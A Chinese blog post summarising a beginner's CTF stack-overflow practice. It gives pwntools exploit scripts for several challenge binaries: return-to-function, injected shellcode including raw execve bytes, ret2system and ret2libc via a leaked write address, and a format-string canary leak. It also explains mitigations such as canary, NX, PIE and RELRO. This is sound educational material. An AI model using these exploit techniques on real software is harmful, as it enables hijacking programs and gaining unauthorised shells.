栈溢出PWN练习总结

最新推荐文章于 2024-07-08 12:28:19 发布
最新推荐文章于 2024-07-08 12:28:19 发布
阅读量1.1k 收藏 3
点赞数 2
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/YangLanLing/article/details/97416568
版权

Level0

首先拿到题目后,先用虚拟机判断一下文件的类型,有什么保护机制

由图可知,level0这个文件是64位的,没有任何保护机制。再运行一下程序,

拖进IDA后发现,里面有个callsystem函数,所以数据就是从这泄露的。所以编写脚本

from pwn import *
 
p = remote('111.198.29.45',33907)
elf = ELF('./level0')
sysaddr = elf.symbols['callsystem']
payload = 'a'*(0x80 + 8) + p64(sysaddr)
p.recv()
p.send(payload)
p.interactive()

运行得到flag。

拿到题目后首先要查看文件类型,保护机制,再用IDA来看伪代码。其实我本人对文件的二进制保护也是不太懂的,所以专门找了资料。

Canary(栈保护)

这个选项表示栈保护功能有没有开启。

栈溢出保护是一种缓冲区溢出攻击缓解手段,当函数存在缓冲区溢出攻击漏洞时,攻击者可以覆盖栈上的返回地址来让shellcode能够得到执行。当启用栈保护后,函数开始执行的时候会先往栈里插入cookie信息,当函数真正返回的时候会验证cookie信息是否合法,如果不合法就停止程序运行。攻击者在覆盖返回地址的时候往往也会将cookie信息给覆盖掉,导致栈保护检查失败而阻止shellcode的执行。在Linux中我们将cookie信息称为canary。

2.NX/DEP(堆栈不可执行)

NX即No-eXecute(不可执行)的意思,NX(DEP)的基本原理是将数据所在内存页标识为不可执行,当程序溢出成功转入shellcode时,程序会尝试在数据页面上执行指令,此时CPU就会抛出异常,而不是去执行恶意指令。

3.PIE/ASLR(地址随机化)

 

4.Fortify 

这个保护机制查了很久都没有个很好的汉语形容,根据我的理解它其实和栈保护都是gcc的新的为了增强保护的一种机制,防止缓冲区溢出攻击。由于并不是太常见,也没有太多的了解。

5.RelRO

设置符号重定向表格为只读或在程序启动时就解析并绑定所有动态符号,从而减少对GOT(Global Offset Table)攻击。

这样解释可能会太多,还有个版本

  • Arch,该项位程序的位数,显示位32位程序。
  • RELRO,RELRO会有Partial RELRO和FULL RELRO,如果开启了FULL RELRO,那么我们将无法修改got表,关于got表后面的文章遇到了再讲解。
  • Stack,栈中是否开启了Canary found,如果该项保护被打开那么我们将无法直接覆盖EIP让程序任意跳转,因为在跳转后将会进行cookie校验,该项保护是可以绕过的,遇到的时候将详细分析。
  • NX,该项表示堆栈是否可执行,如果开启了该项保护,那么我们的shellcode将不能被执行。
  • PIE,该项表示地址随机化保护,如果开启了该项那么程序每次运行的地址都会变化,如果未开启那么No PIE(0x8048000)括号内的代表程序基址。

Level1

可知与level0相同。

拖进IDA中发现没有callsystem函数,所以要用shellcode

from pwn import *
context(arch='i386',os='linux')
p=process("./level1")
#p=remote("pwn2.jarvisoj.com",9877)
p.recvline()
stack_addr=int(p.recv(10),16)
payload=asm(shellcraft.sh()).ljust(0x88)+"A"*4+p32(stack_addr)
p.sendline(payload)
p.interactive()

Level2

拖进IDA后,打开字符窗口,会有system和/bin/sh

所以从这两个地方入手,脚本如下:

from pwn import *
  
context(arch='i386',os='linux')
elf=ELF('./level2')
sysaddr=elf.symbols['system']
shaddr=elf.search('/bin/sh').next()
payload='A' * (0x88+0x4) +p32(sysaddr)+p32(0)+p32(shaddr)
p=remote('111.198.29.45',46661)
p.sendlineafter("Input:\n",payload)
p.interactive()
p.close()

Level3

拖进ida中,会发现有一个write函数。

ssize_t write(int fd,const void*buf,size_t count);
参数说明:
  fd:是文件描述符(write所对应的是写,即就是1)
  buf:通常是一个字符串,需要写入的字符串
  count:是每次写入的字节数
 成功:返回写入的字节数
 失败:返回-1并设置errno
  ps: 写常规文件时,write的返回值通常等于请求写的字节
       数count, 而向终端设备或者网络写时则不一定

所以从write函数入手,获取system和/bin/sh。

from pwn import*
context.log_level="DEBUG"
p=remote("pwn2.jarvisoj.com","9879")
elf=ELF("level3")
plt_write=elf.plt["write"]
main_addr=0x08048484
p.recvline()
payload = "A" * 0x88 + "A" * 4 + p32(plt_write) + p32(main_addr) + p32(1) + p32(elf.got["write"]) + p32(4)
p.send(payload)
write_addr=u32(p.recv(4))
print "write_addr="+hex(write_addr)

libc=ELF("libc-2.19.so")
bss_addr=0x0804a024
libc_system=libc.symbols["system"]
libc_binsh=next(libc.search("/bin/sh"))
libc_write=libc.symbols["write"]

system_addr=write_addr-libc_write+libc_system
binsh_addr=write_addr-libc_write+libc_binsh
print "system_addr="+hex(system_addr)

p.recvline()

payload = "A" * 0x88 + "A" * 4 + p32(system_addr) + p32(0) + p32(binsh_addr)
p.sendline(payload)
p.interactive()

 

格式化字符串泄露canary---pwn1

Canary主要用于防护栈溢出攻击。我们知道,在32位系统上,对于栈溢出漏洞,攻击者通常是通过溢出栈缓冲区,覆盖栈上保存的函数返回地址来达到劫持程序执行流的目的。
Stack canary保护机制在刚进入函数时,在栈上放置一个标志canary,然后 在函数结束时,判断该标志是否被改变,如果被改变,则表示有攻击行为发生。

第一步,先调试,找出canary的位置。

经计算,canary与栈顶相差30。图中箭头所指即为canary。又因为栈底与canary相差12,而整个的大小为116。所以脚本如下:

from pwn import *

shellcode="\x31\xc0\x31\xd2\x31\xdb\x31\xc9\x31\xc0\x31\xd2\x52\x68\x2f\x2f" \
    "\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\x31\xc0\xb0" \
    "\x0b\xcd\x80\n"
context.log_level='debug'
p=process("./pwn1")
#p=remote('172.16.80.240',8000)


#########################leak canary,prev_ebp_addr################
p.recvuntil('name:')
p.sendline('%p.'*40)
leak_data=p.recvuntil('messages:')
address=leak_data.split('.')
for i in range(len(address)):
	print str(i)+':'+str(address[i])
canary=address[30]
print "canary="+canary
prev_ebp_addr=address[33]
print "stack_addr="+prev_ebp_addr

#########################get shellcode_addr########################
shellcode_addr=int(prev_ebp_addr,16)-144+0x8          

#########################send shellcode and get shell##############
payload='a'*100+p32(int(canary,16))+'A'*12+p32(shellcode_addr)+shellcode
p.sendline(payload)
p.interactive()

不管做哪道题,都要一步一步来,分清题目类型。先checksec,在拖进IDA中观察,一定要看伪代码,字符串和函数。然后找地址,找地址一定先调试,然后编写脚本。

本人还是一个小白,有错误的地方,是正常的。

蓝色ling
关注
  • 2
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
pwn栈溢出10道练习题有writeup
01-04
在这个场景中,"pwn栈溢出10道练习题有writeup" 提供了10个关于栈溢出的实战练习,每个题目都配有详细的解答,这对于学习和理解栈溢出漏洞原理及其利用技术非常有帮助。 栈溢出是由于程序在栈上分配的内存不足,...
PWN PWN PWN !!! 技巧 (4)
Xzzzz911的博客
10-29 994
紧接上述技巧(1),技巧(2)和技巧(3),这次总结一些常用的命令,重定向和一些整数溢出需要了解的知识点,还有一些接收发送的命令多做多总结,慢慢的要开始进攻堆了,加油加油,冲冲冲!!!
Pwn基础学习1-[栈溢出]/篇2
m0_52343643的博客
03-29 2328
继上一篇的内容 题目3-ret2syscall 定义 控制程序执行系统调用 原理 不同于之前的 ret2text 和 ret2shellcode 题型,系统调用并不是执行程序中现有的代码或自己写进去的代码,其实就如其字面意思,系统调用就是我们让系统来调用一些函数,那么如何做到让系统来调用,需要满足以下几个条件: 某函数的系统调用号【系统调用号表】—— 放在寄存器 eax 需传入某函数的参数 —— 放在寄存器 ebx、ecx、edx 一个指令 —— int 0x80 int 0x80(软中断)
9.pwn 栈溢出(基本ROP)
最新发布
2301_80361487的博客
07-08 872
函数中的存储在栈中的局部变量数组边界检查不严格发生越界写,造成用户输入覆盖到缓冲区外的数据内容,由于栈中同时存在着与函数调用参数的相关信息,栈溢出可以导致控制流劫持。
pwntools之recv,send方法的理解
热门推荐
hanqdi_的博客
07-06 1万+
pwntools学习 一般在做pwn题,写利用脚本时,会用到recv,send等函数,之前我理解问什么send,不理解recv的作用,现在通过一道题目理解了。下面详细讲解下recv及send的作用。 remote(“一个域名或者ip地址”, 端口) 会连接到我们指定的地址及端口。 然后该函数会返回remote对象 (这里,我们将该对象保存到了变量 c)。remote对象主要用来进行对远程主机的输入输出。 主要方法有: 接收远端传回的数据 interactive() : 在取得shell之后使用,直接进行交
pwntools工具的使用(随时更新中...)
lifanxin的博客
12-11 4834
pwntools工具的使用基本交互和输入输出绑定要处理的程序获取程序输出实现输入 基本交互和输入输出 绑定要处理的程序 # 远程 # remote(ip/hostname, port) p = remote("127.0.0.1", 8888) # 本地 # 注意process中参数一定要有./ p = process("./pwn") 获取程序输出 buf = p.recvline() # buf为程序的一行输出 buf = p.recv() # buf为程序的当前全部输出 # 直
pwn栈溢出基础笔记
小白垃圾笔记2
03-17 757
压入栈内的数据包括调用参数,返回地址,调用函数的基地址,以及局部变量,其中调用参数以外的数据共同构成了被调用函数(callee)的状态。称之为“栈”是因为发生函数调用的时候,调用函数(caller)的状态保存在栈内,被调用函数(callee)的状态被压入调用栈的栈顶。函数调用的时候,栈的变化核心任务是将调用函数(caller)的状态保存起来,同时创建被调用函数(callee)的状态。在函数调用结束时,栈顶的函数(callee)状态被弹出,栈顶恢复到调用函数(caller)的状态,恢复寄存器的值。
Linux pwn入门教程(1)——栈溢出基础-0x01.rar
06-10
Linux pwn入门教程(1)——栈溢出基础
pwn1 一道pwn练习
05-07
pwn练习
一道pwn入门的练习
10-23
直接以一个非常简单的栈溢出例子(基于Linux)来讲解pwn所要用到的一些常用的工具及命令的用例
栈溢出 (1).pdf
09-30
栈溢出是计算机安全领域中的一种常见的漏洞,它发生在程序尝试向栈上的变量写入比分配给该变量的字节还要多的数据时。这种漏洞允许攻击者控制程序的执行流程,进而可能获取系统的控制权。Pwn是黑客的俚语,通常用于...
Pwn基础知识笔记
3569
12-15 4641
http://www.jianshu.com/p/6e528b33e37a pwntools简单语法 作为最好用的pwn工具,简单记一下用法: 连接:本地process()、远程remote( , );对于remote函数可以接url并且指定端口 数据处理:主要是对整数进行打包:p32、p64是打包为二进制,u32、u64是解包为二进制 IO模块:这个比较容易跟zio搞混,记住zio是re
Pwn入门笔记(一)基础编程函数
qq_33590156的博客
11-23 2088
基础编程函数文件库和设置本地文件的调试和远程端口的连接发送和接收文件的加载类函数打/解包函数打包:解包shellcode 正式开始学习pwn了,第一次写pwn脚本,在开始之前需要了解一些基础知识。写pwn脚本我们用python在linux环境下运行。 文件库和设置 安装pwntools库后,开头加上 from pwn import * 这是导入pwntools库的所有函数,也是一个pwn脚本的起点。 context(os="liunx",arch="x86/amd64",log_level="debug"
pwntools常用脚本语句介绍讲解
半岛铁盒的博客
02-23 3290
接收远端传回的数据 interactive() : 在取得shell之后使用,直接进行交互,相当于回到shell的模式。 recv(numb=字节大小, timeout=default) : 接收指定字节数。 recvall() : 一直接收直到达到文件EOF。 recvline(keepends=True) : 接收一行,keepends为是否保留行尾的\n。 recvuntil(delims, drop=False) : 一直读到delims的pattern出现为止。 recvrepeat(timeou
[PWN][补充篇]pwntools的相关知识
网络安全知识分享
03-28 1815
@TOC 0x0 安装 sudo pip install pwntools 0x1 导入包 from pwn import* 0x2 链接远程服务器或者链接本地文件 远程 r = remote(‘目的IP或目标URL’,目标端口号) 本地 r = process('./文件名') 0x3 接收远端回传的数据 interactive() //在取得shell之后使用,直接进行交互,相当于回到shell的模式 recv(numb = 字节大小,timeout = default) //接收指定字节数
攻防世界level2 x_64位
qq_44832048的博客
07-25 1609
64位程序在调用system函数时,参数的传递方式和32位不一样,32位是通过栈传参,而64位通过edi寄存器传参,所以这时我们的思路变成如何覆盖edi的值,通过基本rop就可以做到,利用程序自己的带有pop edi/rdi;ret语句达到给edi赋值的效果。pop edi语句是将当前的栈顶元素传递给edi,在执行pop语句时,只要保证栈顶元素是”/bin/sh”的地址,并将返回地址设置为syst...
pwn防作死
weixin_45209963的博客
08-14 325
1.如果脚本结尾忘了加p.interactive(),并且交互完程序并未停止的话,程序会直接被杀掉……然后你就会看到调试时总是莫名其妙的sigkill……
PWNTOOLS的基本使用
weixin_62675330的博客
02-11 2106
pwntools的基本使用 首先需要 from pwn import * 把 pwntools 导入进来,它同时会把一些系统库给导入进来 本地打的话 p=process('./filename'),远程的话 p=remote('192.168.1.103',10001) p.close() 关闭 发送 payload p.send(payload) 发送 payload p.sendline(payload) 发送 payload,并进行换行(末尾\n) p.sendafter(some_string,
学习笔记lalala
weixin_56780239的博客
02-23 322
orw:发现写shellcode的新大陆 from pwn import * p = remote('chall.pwnable.tw',10001) #p = process('./orw') context.log_level = 'debug' context.terminal = ['deepin-terminal', '-x', 'sh' ,'-c'] if args.G: gdb.attach(p) shellcode = "" shellcode += shellcraft.i3
from pwn import * ImportError: No module named pwn
04-16
当出现`ImportError: No module named ***`的错误时,通常是因为Python无法找到所需的模块。这可能是由于以下原因之一导致的: 1. 模块未安装:确保你已经使用pip或其他包管理器正确安装了所需的模块。如果你没有安装该模块,可以使用以下命令安装numpy模块: ```shell pip install numpy ``` 2. 模块路径错误:如果模块已经安装,但Python仍然无法找到它,可能是因为模块的路径未正确设置。你可以尝试将模块路径添加到PYTHONPATH环境变量中。在Linux或Mac系统中,可以使用以下命令将模块路径添加到PYTHONPATH中: ```shell export PYTHONPATH=/usr/local/lib/python2.7/site-packages ``` 请注意,上述命令中的路径`/usr/local/lib/python2.7/site-packages`是一个示例路径,你需要将其替换为你实际安装模块的路径。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值